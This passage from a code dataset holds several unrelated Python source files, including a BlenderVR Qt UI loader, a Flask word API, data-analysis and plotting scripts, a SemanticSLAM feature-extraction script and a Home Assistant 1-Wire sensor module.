kdtree_random.search_knn_vector_3d(pos1_random[random_point[0], :], idx.shape[0])\n # idx_random = np.array(idx_random)\n # pos1[idx[0:], :] = pos1_random[idx_random[0:], :]\n # pos2[idx[0:], :] = pos2_random[idx_random[0:], :]\n # color1[idx[0:], :] = color1_random[idx_random[0:], :]\n # color2[idx[0:], :] = 
color2_random[idx_random[0:], :]\n # flow[idx[0:], :] = flow_random[idx_random[0:], :]\n # mask1[idx[0:]] = mask1_random[idx_random[0:]]\n # return pos1, pos2, color1, color2, flow, mask1\n # else:\n # return pos1, pos2, color1, color2, flow, mask1\n\n def __len__(self):\n return len(self.datapath)\n\n\nif __name__ == '__main__':\n train = ModelNet40(1024)\n test = ModelNet40(1024, 'test')\n for data in train:\n print(data[0].shape)\n break\n","repo_name":"mertkiray/flownet3d_pytorch","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1600793107","text":"try:\n\n import os\n import random\n if BlenderVR_QT == 'PyQt4':\n from PyQt4 import QtGui\n else:\n from PySide import QtGui\n\n random.seed()\n\n def load(ui_file, parent_widget):\n fileName, fileExtension = os.path.splitext(ui_file)\n if fileExtension != '.ui':\n return None\n py_file = fileName + '.py'\n if (not os.path.isfile(py_file)\n or os.path.getmtime(py_file) < os.path.getmtime(ui_file)):\n if BlenderVR_QT == 'PyQt4':\n command = 'pyuic4 -w'\n else:\n command = 'pyside-uic'\n os.system(command + ' -o ' + py_file + ' ' + ui_file)\n\n module_path = os.path.dirname(py_file)\n if not os.path.isdir(module_path):\n return None\n\n module_name = os.path.splitext(os.path.basename(py_file))[0]\n try:\n import imp\n (file, file_name, data) = imp.find_module(module_name,\n [module_path])\n except:\n return None\n\n try:\n module = imp.load_module('ui_' + str(random.randrange(268431360)),\n file, file_name, data)\n except:\n return None\n\n import inspect\n for name in dir(module):\n element = getattr(module, name)\n if inspect.isclass(element):\n result = element()\n result.setupUi(parent_widget)\n return result\n return None\n\n def insertWidgetInsideAnother(parent, child):\n child.setParent(parent)\n grid = QtGui.QGridLayout(parent)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.setSpacing(0)\n grid.setContentsMargins(0, 0, 0, 0)\n grid.addWidget(child, 0, 0, 1, 1)\n return grid\n\nexcept:\n pass\n","repo_name":"BlenderVR/source","sub_path":"modules/blendervr/tools/gui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"22421250455","text":"#%%\n# p64\ntext = \"You say goodbye and I say hello.\"\ntext = text.replace('.', ' .')\ntext\n# %%\nwords = text.split(' ')\nwords\n# %%\nword_to_id = {}\nid_to_word = {}\nfor word in words:\n if word not in word_to_id:\n new_id = len(word_to_id)\n word_to_id[word] = new_id\n id_to_word[new_id] = word\nprint(word_to_id)\nprint(id_to_word)\n# %%\nid_to_word[1]\nword_to_id[\"hello\"]\n# %%\nimport numpy as np\ncorpus = [word_to_id[w] for w in words]\ncorpus = np.array(corpus)\ncorpus\n# %%\ndef preprocess(text):\n text = text.lower()\n text = text.replace('.', ' .')\n words = text.split(' ')\n\n word_to_id = {}\n id_to_word = {}\n for word in words:\n if word not in word_to_id:\n new_id = len(word_to_id)\n word_to_id[word] = new_id\n id_to_word[new_id] = word\n corpus = np.array([word_to_id[e] for e in words])\n\n return corpus, word_to_id, id_to_word\n\n# %%\nprint(preprocess(\"yorosiku onegai simasu\"))\n# %%\ntext = \"You say goodbye and I say hellow.\"\ncorpus, word_to_id, id_to_word = preprocess(text)\n\n# %%\n# util.pyのpreprocess関数を使う\nimport sys\nsys.path.append('..')\nfrom util import preprocess\ntext = \"You say goodbye and I 
say hellow.\"\nprint(preprocess(text))\n# %%\n","repo_name":"englishta/algorithm","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7277575427","text":"from model import Overview\nfrom store import init_data_set, timeit, Database\nimport pandas as pd\n\n\n# Total number of outpatient attendances\n# opd_attendance,OPD attendance, GENERAL\n\n# Number of pregnant women with at least one ANC visit\n# 1st_anc_visits,1st ANC Visits, MNCH\n\n# Number of facility births\n# births,Deliveries in unit, MNCH\n\n# Number of perinatal deaths\n# newborn_deaths,Newborn deaths, MNCH\n\n# Number of maternal deaths\n# maternal_deaths__mnch_all,Maternal deaths (all), MNCH\n\n# Number of children younger than 1 year receiving their third dose of diphtheria-tetanus–pertussis (DPT3)\n# dpt3__u1_all,DPT3 doses (all), EPI\n\n# Number of children younger than 1 year receiving their first dose of measles vaccine (MR1)\n# mr1__u1_all,MR1 doses (all), EPI\n\n# Number of children 0-59 months diagnosed with severe wasting and bilateral pitting oedema (SAM)\n# sam_identified,SAM cases identified, NUT\n\n# Number of children 0–59 months of age who received an age-appropriate dose of vitamin A in each semester (Vit A second doses)\n# vitamin_a,Doses of vitamin A (1st & 2nd), NUT\n\n# Number of confirmed TB cases\n# tb_cases_registered,TB cases registered, TB\n\n# Number of injuries due to GBV\n# injuries_gbv,Injuries related to GBV, FP\n\n\n@timeit\ndef overview_plot(data):\n\n # TODO : add this to Card mutation rather then in plot function\n\n data = data.get(\"date_filter\")\n\n min_date = data.date.min()\n max_date = data.date.max()\n\n # filter indicators\n index = [\"date\"]\n indicators = {\n \"OPD attendance\": \"rgb(39, 190, 182)\",\n \"1st ANC Visits\": \"rgb(244, 174, 26)\",\n \"Deliveries in unit\": \"rgb(244, 174, 26)\",\n \"Newborn deaths\": \"rgb(244, 174, 26)\",\n \"Maternal deaths\": \"rgb(244, 174, 26)\",\n \"DPT3 doses to U1\": \"rgb(81, 139, 201)\",\n \"MR1 doses to U1\": \"rgb(81, 139, 201)\",\n \"SAM cases identified\": \"rgb(238, 47, 68)\",\n \"1st & 2nd doses of vitamin A to U5\": \"rgb(103, 191, 107)\",\n \"TB cases registered in treatment unit\": \"rgb(236, 70, 139)\",\n \"Injuries related to GBV\": \"rgb(145, 91, 166)\",\n }\n\n data = data[index + list(indicators.keys())]\n\n data = data.groupby(by=\"date\").sum().reset_index()\n\n data = pd.melt(data, id_vars=[\"date\"])\n\n data = pd.pivot_table(\n data, values=\"value\", index=\"variable\", columns=\"date\"\n ).reset_index()\n\n data[\"percentage\"] = (data[max_date] - data[min_date]\n ) / data[min_date] * 100\n\n data[\"percentage\"] = data[\"percentage\"].apply(lambda x: round(x, 1))\n\n data.rename(\n columns={max_date: \"absolute\", \"variable\": \"indicator_name\"}, inplace=True\n )\n\n data[\"color\"] = data[\"indicator_name\"].apply(lambda x: indicators.get(x))\n\n data.drop(columns=[min_date], inplace=True)\n\n for col in data.columns:\n data[col] = data[col].astype(str)\n\n data[\"percentage\"] = data[\"percentage\"].apply(\n lambda x: f\"{x}%\" if x[0] == \"-\" else f\"+{x}%\"\n )\n\n sort_dict = dict(\n zip(list(indicators.keys()), range(0, len(list(indicators.keys()))))\n )\n\n data.sort_values(\n by=[\"indicator_name\"],\n inplace=True,\n key=lambda x: x.map(sort_dict),\n )\n\n data.set_index([\"indicator_name\", \"color\", \"percentage\"], inplace=True)\n\n return {\"overview\": 
data}\n\n\noverview = Overview(\n data=init_data_set,\n data_transform=overview_plot,\n title='Absolute value on month of interest and between month of reference and month of interest for priority indicators'\n)\n","repo_name":"DalbergDataInsights/cehs","sub_path":"coc-dashboard/components/indicators_overview.py","file_name":"indicators_overview.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26712626279","text":"def print_sudoku(sudoku: list):\n print()\n print()\n # for row in sudoku:\n for i in range(1, 10):\n count = 1\n # for col in row:\n for col in sudoku[i - 1]:\n if count % 3 == 0:\n print(\"_ \", end=\"\") if col == 0 else print(f\"{col} \", end=\"\")\n else:\n print(\"_ \", end=\"\") if col == 0 else print(f\"{col} \", end=\"\")\n count += 1\n if i % 3 == 0:\n print()\n print()\n else:\n print()\n\n\ndef copy_and_add(sudoku: list, row_no: int, column_no: int, number: int):\n new_sudoku = []\n for row in sudoku:\n new_row = []\n for square in row:\n new_row.append(square)\n new_sudoku.append(new_row)\n new_sudoku[row_no][column_no] = number\n return new_sudoku\n","repo_name":"alexandroscharangionis/MOOC_Helsinki_Python","sub_path":"part05-11_sudoku_add_to_copy/src/sudoku_add_to_copy.py","file_name":"sudoku_add_to_copy.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37139168435","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass Exponential:\n @staticmethod\n def P(ld, x):\n if x >= 0:\n return ld * np.exp(-ld * x)\n else:\n return 0\n\n @staticmethod\n def sample(ld):\n s_50 = np.array([Exponential.P(ld, i) for i in range(51)])\n s_100 = np.array([Exponential.P(ld, i) for i in range(101)])\n s_1000 = np.array([Exponential.P(ld, i) for i in range(1001)])\n return s_50, s_100, s_1000\n\n @staticmethod\n def hist_bar_kdeplot(ld):\n fig, ax = plt.subplots(3, 3)\n fig.set_size_inches(15, 10)\n sample = Exponential.sample(ld)\n\n ax[0, 0].set_title(\"sample size = 50\")\n ax[0, 1].set_title(\"sample size = 100\")\n ax[0, 2].set_title(\"sample size = 1000\")\n ax[0, 0].hist(sample[0], bins=20, edgecolor=\"black\")\n ax[0, 1].hist(sample[1], bins=20, edgecolor=\"black\")\n ax[0, 2].hist(sample[2], bins=20, edgecolor=\"black\")\n ax[1, 0].bar(np.arange(51), sample[0])\n ax[1, 1].bar(np.arange(101), sample[1])\n ax[1, 2].bar(np.arange(1001), sample[2])\n sns.kdeplot(sample[0], ax=ax[2, 0])\n sns.kdeplot(sample[1], ax=ax[2, 1])\n sns.kdeplot(sample[2], ax=ax[2, 2])\n\n plt.show()\n","repo_name":"MoncefDj/AI-DS-Masters","sub_path":"1st semester/Statistics for Data Science/Workshop 03/Exponential.py","file_name":"Exponential.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17731724971","text":"\"\"\"\r\nThis is the script I used to convert the output file with the clonal architecture into a format readable by\r\nEvoFreq. 
This was an integral part of my Muller Plot pipeline.\r\n\"\"\"\r\n\r\nimport sys\r\nimport csv\r\n\r\n\"\"\"\r\nArgument List Structure\r\n[0]----'Single_file.py'\r\n[1]----File names to condense\r\n[2]----Column# (length of simulation)\r\n[3]----Lower loop bound\r\n[4]----Upper loop bound\r\n[5]----Domain Size\r\n[6]----Skip Parameter (Use 1 to include all time points, use n>1 to only include every nth time point)\r\n[7]----Threshold (In Percent)\r\n\"\"\"\r\n\r\ntiming = int(sys.argv[6])\r\ncolumns = int(sys.argv[2]) // timing # integer division, so the range() calls below receive an int on Python 3\r\nthreshold = float(sys.argv[7]) / 100\r\n\r\nfor i in range(int(sys.argv[3]), int(sys.argv[4]) + 1):\r\n core_name = sys.argv[1] + str(i)\r\n new_file = open(\"DS_\" + sys.argv[5] + \"_\" + str(i) + \".csv\", \"a\")\r\n data = [['parents', 'clones']]\r\n for t in range(0, columns + 1):\r\n data[0].append(t * timing)\r\n with open(core_name + '.txt', 'rt') as f:\r\n csv_reader = csv.reader(f)\r\n population = next(csv_reader)\r\n parents = next(csv_reader)\r\n clones = next(csv_reader)\r\n next(csv_reader)\r\n data.append([0, 0])\r\n initial_pop = next(csv_reader)\r\n for t in range(0, columns + 1):\r\n data[1].append(int(initial_pop[t * timing + 8]))\r\n for l in range(0, len(clones)):\r\n data.append([])\r\n data[l + 2].append(int(parents[l]))\r\n data[l + 2].append(int(clones[l]))\r\n pop = next(csv_reader)\r\n for t in range(0, columns + 1):\r\n data[l + 2].append(int(pop[t * timing + 8]))\r\n f.close()\r\n for r in range(0, len(data)):\r\n line_holder = str(data[r][0])\r\n for c in range(1, len(data[r])):\r\n line_holder += ',' + str(data[r][c])\r\n new_file.write(line_holder)\r\n new_file.write(\"\\n\")\r\n new_file.close()\r\n\r\n\r\n\r\n","repo_name":"jackedwards1/CE_ABM","sub_path":"muller_converter.py","file_name":"muller_converter.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} {"seq_id":"29504327110","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\nfile = r'\\GDP_PPP.xlsx'\r\nfolder = r'Z:\\...'\r\nlink = folder + file\r\n\r\nvfolder=r'Z:\\...'\r\n\r\ndata = pd.read_excel(link, skiprows=[0, 1, 2])\r\n\r\n#print(data.columns)\r\n#print(data['Country Name'])\r\n\r\ndata = data.rename(columns={\"Country Name\": \"ctry_name\", \"Country Code\": \"ctry_code\",\r\n \"Indicator Name\": \"indicator\", \"Indicator Code\": \"ind_code\"})\r\n\r\ndata = data.set_index('ctry_name')\r\n\r\n\r\ndata2=data.loc[['China', 'Mexico'], :]\r\n\r\n\r\ndata2=data2.drop(['1960', '1961', '1962', '1963', '1964', '1965', '1966', '1967', '1968', '1969', '1970', '1971', '1972',\r\n '1973', '1974', '1975', '1976', '1977', '1978', '1979', '1980', '1981', '1982', '1983', '1984',\r\n '1985', '1986', '1987', '1988', '1989', '2019'], axis=1)\r\n#print(years)\r\n\r\ncolumns = ['ctry_code', 'indicator', 'ind_code']\r\ndata2.drop(columns, inplace=True, axis=1)\r\n\r\ndata_transpose = data2.T\r\n\r\ndata_transpose['China'] = data_transpose['China']/1000000000000\r\ndata_transpose['Mexico'] = data_transpose['Mexico']/1000000000000\r\n#data_transpose['World'] = data_transpose['World']/1000000000\r\n\r\n\r\n#print(data_transpose)\r\n\r\nsns.set(style=\"darkgrid\")\r\nfig, ax = plt.subplots(figsize=(15, 7))\r\n\r\n\r\nax.plot(data_transpose.index, data_transpose.China, 'r', linewidth=3, label='China')\r\nax.plot(data_transpose.index, data_transpose.Mexico, 'g', linewidth=3, label=\"Mexico\")\r\nax.set_ylabel('GDP, PPP (Billion USD 
$)');\r\nax.set_xlabel('Year');\r\nplt.legend(title='Countries')\r\n\r\n#plt.show()\r\nplt.savefig(vfolder + r'\\GDP_PPP.png')\r\n\r\nplt.close()","repo_name":"lthayn/china_mexico","sub_path":"GDP_PPP.py","file_name":"GDP_PPP.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"42668463437","text":"#!venv/bin/python\nfrom flask import Flask, jsonify, request, abort, make_response\n\napp = Flask(__name__)\n\nwords = []\n\n@app.route('/')\ndef index():\n return \"Hello, Moxrie\"\n\n@app.route('/words/<word>', methods=['GET'])\ndef get_word(word):\n # materialize a list (filter() is lazy on Python 3, so len() and indexing would fail)\n the_word = [w for w in words if w['string'] == word]\n if len(the_word) == 0:\n abort(404)\n return jsonify( the_word[0] )\n\n\n@app.route('/words/<word>', methods=['POST'])\ndef post_word(word):\n if not request.json or not word:\n abort(400)\n json_obj = request.json\n\n if not word_json_valid(json_obj):\n abort(400)\n\n word_already_exists = False\n for w in words:\n if w['string'] == word:\n word_already_exists = True\n if word_already_exists:\n abort(400)\n\n the_word = {\n 'string': word,\n 'meaning': request.json['meaning'],\n 'use': request.json['use'],\n 'legal': False,\n 'references': request.json['references']\n }\n words.append(the_word)\n return jsonify( the_word ), 201\n\ndef word_json_valid(json_request):\n if not 'meaning' in json_request:\n return False\n if not 'use' in json_request:\n return False\n if not 'references' in json_request:\n return False\n return True\n\n\n\nif __name__ == '__main__':\n app.run(debug = True)\n","repo_name":"muskox/moxrie","sub_path":"moxrie.py","file_name":"moxrie.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} {"seq_id":"72470166200","text":"from typing import List # typing.List (not ast.List, which is an AST node) provides the annotation type\nimport bisect\n\n# 2251: Number of Flowers in Full Bloom\n# Last Updated: Oct 11, 2023\nclass Solution:\n def fullBloomFlowers(self, flowers: List[List[int]], people: List[int]) -> List[int]:\n bloom, wilt = [], []\n for b, w in flowers:\n bloom.append(b)\n wilt.append(w + 1)\n\n bloom.sort()\n wilt.sort()\n for i in range(len(people)):\n t = people[i]\n people[i] = bisect.bisect_right(bloom, t) - bisect.bisect_right(wilt, t)\n return people","repo_name":"damiyu/leetcode-profile","sub_path":"algorithms/hard/hard2251/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} {"seq_id":"9920696650","text":"\"\"\"palindromic prime finder\nclare walker\n5 may 2014\"\"\"\nimport math\n\nimport sys\nsys.setrecursionlimit(30000)\n\ndef palin(string):\n if len(string)==1: #if at end, just return first letter\n return string\n else:\n return string[-1] + palin(string[:-1]) #reverse word\n\ndef palincheck(number): \n \"\"\"returns True if number is a palindrome, False if not\"\"\"\n if str(number) == palin(str(number)):\n return True\n else: \n return False\n\ndef primecheck(number, divisor):\n \"\"\"returns True if number is a prime number, False if not\"\"\"\n # make exceptions for number 1 and 2\n if number ==1:\n return False\n elif number ==2:\n return True\n #if divisor has reached square root of number and no factor has been found, final prime decision is made\n elif divisor >= math.sqrt(number):\n if number%divisor==0: #if square root is a factor, then not prime\n return False\n else:\n return True # if all up to square 
root, and square root, are not factors, number is a prime\n elif number % divisor == 0: #factor found, thus not prime\n return False\n else: # carry on\n return primecheck(number, divisor +1)\n\ndef palinprime(N, M):\n \"\"\"iterates through interval [N, M] and makes a string of palindromic primes each separated by a space\"\"\"\n if N==M:\n if palincheck(N) and primecheck(N,2):\n return str(N)\n else:\n return \"\"\n else:\n if palincheck(N) and primecheck(N,2):\n return str(N) + ' '+ palinprime(N + 1, M)\n else:\n return palinprime(N+1, M)\n\ndef printpp(pplist):\n \"\"\"prints a given list with each item on a new line\"\"\"\n if len(pplist) ==1:\n return print(pplist[0])\n else:\n print(pplist[0])\n return printpp(pplist[1:])\n \n \ndef main(): #get and process inputs using functions\n N = eval(input(\"Enter the starting point N:\\n\"))\n M = eval(input(\"Enter the ending point M:\\n\"))\n palinprimes=palinprime(N, M)\n pplist = palinprimes.split(' ') # turns string into a list that can be printed\n print(\"The palindromic primes are:\")\n printpp(pplist)\n \n\nif __name__ ==\"__main__\":\n main()\n \n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/wlkcla004/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23928406432","text":"import os,json,torch\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nimport numpy as np\n# import shutil\n\nfrom observation_system import Observation_System\nfrom parameters import Parameters\nfrom segment_anything import SamPredictor, SamAutomaticMaskGenerator, sam_model_registry\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom resnet import FeatureExtractor\nfrom einops import rearrange\nimport torchvision.transforms as transforms\nfrom model_utils import project_to_ground_plane, compute_spatial_locs\n\nnp.set_printoptions(precision=2,linewidth=40000,threshold=1000000)\ntorch.set_printoptions(precision=2,edgeitems=1000,linewidth=40000,threshold=1000000)\n\ndef create_folder(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\ndef main():\n new_directory = \"/home/mli170/SLAM_PROJECT/SemanticSLAM_data/2023_Apr29th_segment_process\" # Replace this with the desired directory path\n os.chdir(new_directory)\n\n print('''2023 Aug20th dataset\n version details: The ground layers are 1 in semantc and -1 in abstract, and invisible are all 0\n However, the pointcloud just points to farset points. 
So we use ceiling to indicate visible ground area.\n\n 2.recommand set noise threshold to 0.02 when scale=3, \n which means any cell contains 2% total pixel are considered as noise\n\n 3.resnet extract low-level feautre of the images, then project to the ground by pointcloud with 64 channel\n\n 4.The numpy file is a array of length L, with each [position, obervation_wochannel, observation_semantic, observation_shallow_feature]\n\n ''')\n \n\n length = 80\n device = 'cuda:0'\n # output_path = 'data_1_seg'\n output_path = 'data_3_seg_resnet'\n print('intput_folder:','2023_Jun19th_dataset_w_rgbd_raw_scale3_40objects')\n print('output_folder:',output_path) \n\n # =============Load Resnet Model and Segment Anything Model================\n featureExtr = FeatureExtractor().to(device=device)\n # sam = sam_model_registry[\"vit_b\"](checkpoint=\"../segment_anything/sam_vit_b_01ec64.pth\")\n sam = sam_model_registry[\"vit_h\"](checkpoint=\"./segment_anything/sam_vit_h_4b8939.pth\")\n sam.to(device=device)\n predictor = SamPredictor(sam)\n \n preprocess = transforms.Compose([\n # transforms.ToPILImage(),\n transforms.ToTensor(), # This step normalizes the values\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n\n # =============Load Semantic Model================\n P = Parameters()\n obs_system = Observation_System(P, predictor, device)\n \n \n for id in tqdm(range(1,31,1)):\n print('\\nEnv id: slam_'+str(id))\n base_path='../data_raw/2023_Jun19th_dataset_w_rgbd_raw_scale3_40objects/slam_%d/'%id\n create_folder(base_path+'/raw')\n #for i in range(3):\n # shutil.move(base_path+\"%d.npy\"%(i+1), base_path+\"/raw/%d.npy\"%(i+1))\n\n files=os.listdir(base_path+'raw/')\n create_folder(base_path+'/image')\n #create_folder(base_path+'/data')\n #create_folder(base_path+'/data_2')\n create_folder(base_path+'/'+output_path)\n #create_folder(base_path+'/data_test')\n create_folder(base_path+'/camera')\n \n npy_files=[]\n for i in files:\n if i.find('.npy')>=0:\n npy_files.append(i)\n npy_files.sort()\n\n for i in npy_files:\n check=0\n name = i.split('.')[0]\n data = np.load(base_path+'raw/'+i,allow_pickle=True,encoding='bytes')\n\n # env = np.load(base_path+'label.npy',allow_pickle=True,encoding='bytes')\n # print(f'Env:\\n{env}')\n n = 1\n tmp = []\n camera = []\n print(f'total data number:{len(data)}')\n for j in data:\n \n check+=1\n position = j[0]\n image = j[1].astype(np.int32)\n image = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)\n \n # print(image.shape)\n # plt.imsave(f'{check}.png',j[1])\n\n pointcloud = j[2].astype(np.float64)\n pointcloud = pointcloud.reshape(image.shape) #h, w, 3\n\n # ---------Call function to generate YoloV3+Segmentation observations---------------\n valid,observation,observation_s = obs_system.yolo_generate(image,pointcloud,np.array(position))\n if not valid: \n print('Invalid ID: ',check-1)\n continue\n \n # -------Get low level feature from the image and depth---------\n \n image = preprocess(image)[None,].to(device) # (bs, f, H/K, W/K)\n pointcloud = rearrange(torch.tensor(pointcloud)[None,].to(device), 'b h w c -> b c h w') # (bs, 3, H, W)\n img_feature = featureExtr(image)\n # print(f\"image:{img_feature.shape}\\n{img_feature}\") \n # print(f\"pointcloud:{pointcloud.shape}\\n{pointcloud}\")\n # project to ground\n spatial_locs, valid_inputs = compute_spatial_locs(pointcloud, P.local_map_shape[1:], P.grid_unit)\n ground_feature = project_to_ground_plane(img_feature, spatial_locs, valid_inputs, P.local_map_shape[1:], 
4).detach().cpu().numpy() # (1, F, s, s)\n rotated_gp_feature = obs_system.rotate_3D(ground_feature.copy(),180,False)\n # print(f\"ground_feature:{ground_feature.shape}\\n{ground_feature}\")\n # for i in range(64):\n # print(f\"channel:{i}\")\n # for j in range(33):\n # print(ground_feature[0,i,j])\n # print(\"rotate\")\n # for j in range(33):\n # print(rotated_gp_feature[0,i,j])\n # return\n '''add ground layer to observations'''\n # ones = torch.ones((1,1,*observation_s.shape))\n # sum = torch.sum(observation_s,axis=1)\n # sum = ones - sum\n # sum = sum[0]\n # observation_s = observation_s[0]\n # observation_s = torch.vstack((sum,observation_s))\n # observation_s = observation_s[None,:]\n\n # print(f'observation_After:{observation.shape}\\n{observation}')\n # print(f'obserobservation_semantic_scorevation_After:{observation_s.shape}\\n{observation_s}')\n tmp.append(np.array([np.array(position),np.array(observation),np.array(observation_s),rotated_gp_feature],dtype=object))\n #camera.append(np.array([np.array(position),np.array(image),np.array(pointcloud)],dtype=object))\n #image = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)\n #cv2.imwrite(base_path+'/image/%s/%d.png'%(name,n),image)\n n+=1\n\n if n==length+1:\n break\n\n \n if len(tmp) != length:\n print('Error length',f'{length} step needed but got {len(tmp)}')\n return\n num = length -len(tmp)\n for j in range(num):\n tmp = np.vstack((tmp,tmp[-1]))\n\n # for j in range(length):\n # tmp[j][2] = np.where(tmp[j][2]>0,tmp[j][2],0)\n # tmp[j][2] = np.where(tmp[j][2]<1,tmp[j][2],1)\n print(f'position:{np.array(position).shape}\\nobservation:{np.array(observation).shape}\\nobservation_s:{np.array(observation_s).shape}ground_feature:{ground_feature.shape}')\n \n np.save(base_path+f'{output_path}/{name}.npy',np.array(tmp,dtype=object))\n #np.save(base_path+'camera/%s.npy'%(name),np.array(camera,dtype=object))\n #break\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leomingyangli/SemanticSLAM_data","sub_path":"2023_Apr29th_segment_process/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27152648347","text":"\"\"\"Support for 1-Wire environment sensors.\"\"\"\nfrom __future__ import annotations\n\nimport asyncio\nfrom collections.abc import Callable, Mapping\nimport copy\nfrom dataclasses import dataclass\nimport logging\nimport os\nfrom types import MappingProxyType\nfrom typing import TYPE_CHECKING, Any\n\nfrom pi1wire import InvalidCRCException, OneWireInterface, UnsupportResponseException\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_TYPE,\n ELECTRIC_POTENTIAL_VOLT,\n LIGHT_LUX,\n PERCENTAGE,\n PRESSURE_CBAR,\n PRESSURE_MBAR,\n TEMP_CELSIUS,\n)\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import StateType\n\nfrom .const import (\n CONF_TYPE_OWSERVER,\n CONF_TYPE_SYSBUS,\n DEVICE_KEYS_0_3,\n DEVICE_KEYS_A_B,\n DOMAIN,\n OPTION_ENTRY_DEVICE_OPTIONS,\n OPTION_ENTRY_SENSOR_PRECISION,\n PRECISION_MAPPING_FAMILY_28,\n READ_MODE_FLOAT,\n READ_MODE_INT,\n)\nfrom .model import OWDirectDeviceDescription, OWServerDeviceDescription\nfrom .onewire_entities 
import (\n OneWireBaseEntity,\n OneWireEntityDescription,\n OneWireProxyEntity,\n)\nfrom .onewirehub import OneWireHub\n\n\n@dataclass\nclass OneWireSensorEntityDescription(OneWireEntityDescription, SensorEntityDescription):\n \"\"\"Class describing OneWire sensor entities.\"\"\"\n\n override_key: Callable[[str, Mapping[str, Any]], str] | None = None\n\n\ndef _get_sensor_precision_family_28(device_id: str, options: Mapping[str, Any]) -> str:\n \"\"\"Get precision form config flow options.\"\"\"\n precision: str = (\n options.get(OPTION_ENTRY_DEVICE_OPTIONS, {})\n .get(device_id, {})\n .get(OPTION_ENTRY_SENSOR_PRECISION, \"temperature\")\n )\n if precision in PRECISION_MAPPING_FAMILY_28:\n return precision\n _LOGGER.warning(\n \"Invalid sensor precision `%s` for device `%s`: reverting to default\",\n precision,\n device_id,\n )\n return \"temperature\"\n\n\nSIMPLE_TEMPERATURE_SENSOR_DESCRIPTION = OneWireSensorEntityDescription(\n key=\"temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nDEVICE_SENSORS: dict[str, tuple[OneWireSensorEntityDescription, ...]] = {\n \"10\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"12\": (\n OneWireSensorEntityDescription(\n key=\"TAI8570/temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n entity_registry_enabled_default=False,\n name=\"Temperature\",\n native_unit_of_measurement=TEMP_CELSIUS,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"TAI8570/pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n entity_registry_enabled_default=False,\n name=\"Pressure\",\n native_unit_of_measurement=PRESSURE_MBAR,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n ),\n \"22\": (SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,),\n \"26\": (\n SIMPLE_TEMPERATURE_SENSOR_DESCRIPTION,\n OneWireSensorEntityDescription(\n key=\"humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH3600/humidity\",\n device_class=SensorDeviceClass.HUMIDITY,\n entity_registry_enabled_default=False,\n name=\"Humidity HIH3600\",\n native_unit_of_measurement=PERCENTAGE,\n read_mode=READ_MODE_FLOAT,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n OneWireSensorEntityDescription(\n key=\"HIH4000/humidity\",\n 